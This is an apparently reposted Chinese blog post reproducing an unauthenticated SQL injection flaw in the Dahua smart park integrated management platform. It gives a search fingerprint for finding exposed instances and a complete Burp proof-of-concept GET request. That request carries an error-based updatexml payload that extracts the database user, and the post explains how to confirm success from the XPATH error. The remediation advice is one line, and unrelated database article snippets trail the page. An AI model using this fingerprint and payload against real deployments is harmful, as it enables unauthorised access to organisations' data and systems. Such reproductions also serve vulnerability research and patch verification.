首页 > 数据库 >大华智慧园区综合管理平台SQL注入漏洞复现

大华智慧园区综合管理平台SQL注入漏洞复现

时间:2023-08-19 17:04:55浏览次数:43  
标签:7D zh 漏洞 7B% 复现 SQL 大华 园区

一、 产品简介

大华智慧园区综合管理平台 是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

二、 漏洞概述

大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权用户可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

三、 复现环境

鹰图指纹:web.body="/WPMS/asset/lib/gridster/"

大华智慧园区综合管理平台SQL注入漏洞复现_漏洞复现

四、 漏洞复现

Burp PoC验证

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: ip地址
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

查询当前用户

如果发现了XPTAH这个关键的字样,这个就是报错注入错误回显的特征,只要看到它,就可以判断这个就是存在报错注入

大华智慧园区综合管理平台SQL注入漏洞复现_漏洞复现_02

五、 修复建议

限制访问来源地址,如非必要,不要将系统开放在互联网上。等待官方补丁

标签:7D,zh,漏洞,7B%,复现,SQL,大华,园区
From: https://blog.51cto.com/u_16230815/7150585

相关文章

  • MySqlBulkLoader批量数据插入
    MySqlBulkLoader批实现过程:将需要的数据集保存到CSV文件,然后再从文件里面读取。 CsvHelp1///<summary>2///定义csv文件3///</summary>4///<paramname="folder">路径</param>5///<paramname="......
  • PostgreSQL 源码性能诊断(perf profiling)指南(含火焰图生成分析FlameGraph) - 珍藏级
    PostgreSQL源码性能诊断(perfprofiling)指南(含火焰图生成分析FlameGraph)-珍藏级作者digoal日期2016-11-28标签PostgreSQL,Linux,perf,性能诊断,stap,systemtap,strace,dtrace,dwarf,profiler,perf_events,probe,dynamicprobe,tracepoint......
  • java实现本地数据与阿里云MySQL数据同步:动态表创建与数据更新
    在开发应用程序时,经常需要将数据从一个数据源(如API、外部数据库等)同步到本地数据库中。这可能涉及到不同的表结构和数据模式。在这种情况下,一个主要的挑战是,如果本地数据库中的表结构与源数据不匹配,应该如何自动适应这些变化并确保数据同步的顺利进行。解决方案:动态表创建与数据......
  • SQL Server 批量导出存储过程、视图和函数
    selecta.name,a.[type],b.[definition]FROMsys.all_objectsa,sys.sql_modulesbwherea.is_ms_shipped=0anda.object_id=b.object_idanda.[type]in('P','V','AF')orderbya.[name]asc当type为‘P’时,为存储过程当 type为‘V’......
  • Windows安装MySQL后怎么开启root的网络访问权限
    Windows安装MySQL后默认只能本机访问,怎么开启网络访问mysql>createuser'root'@'%'identifiedby'password';QueryOK,0rowsaffected(0.00sec)mysql>grantallon*.*to'root'@'%';QueryOK,0rowsaffected(0.00s......
  • Windows安装MySQL后怎么设置环境变量
    Windows安装MySQL后默认不会设置环境变量需要手动添加已Windows11为例我的电脑-右键-属性-高级系统设置选择环境变量Path选择编辑新建环境变量把MySQL的bin路径添加进去注意:Windows10使用下面的Path添加......
  • 【LeetCode1384. 按年度列出销售总额】MySQL使用with recursive根据开始日期和结束日
    题目地址https://leetcode.cn/problems/total-sales-amount-by-year/description/代码WITHRECURSIVEDateSeriesAS(SELECTproduct_id,period_startASsale_date,period_end,average_daily_salesFROMSales--Assumingyourtablenameissales_dataUN......
  • Sql server-自定义函数
    定义:一种方法1.创建函数,求该银行的金额总和--(没有参数,返回标量值)gocreatefunctiongetsumcardbalance()returnmoneyasbegindeclare@sumcardbalancemoneyset@sumcardbalance=(selectsum(cardbalance)frombankcard)return@sumcardbalance end2.调用验证select......
  • Visual Studio 2022 没有MySQLDatabase数据源
    解决办法: ①下载安装MySQLODBC驱动②运行ODBC数据源管理器③添加MySQL数据源,填入相应信息,测试通过即可④打开VS 工具>>连接到数据库,选择MicrosoftODBCDataSource⑤下拉列表中选择刚才新建的ODBC数据源,确定。       由此,在VS的侧边栏就可以对MySQL......
  • 【LeetCode2199. 找到每篇文章的主题】字符串处理题,使用MySQL里的group_concat和LOCAT
    题目地址https://leetcode.cn/problems/finding-the-topic-of-each-post/description/代码witht1as(selectp.*,k.*fromPostspleftjoinKeywordskonLOCATE(LOWER(CONCAT('',word,'')),LOWER(CONCAT('',conte......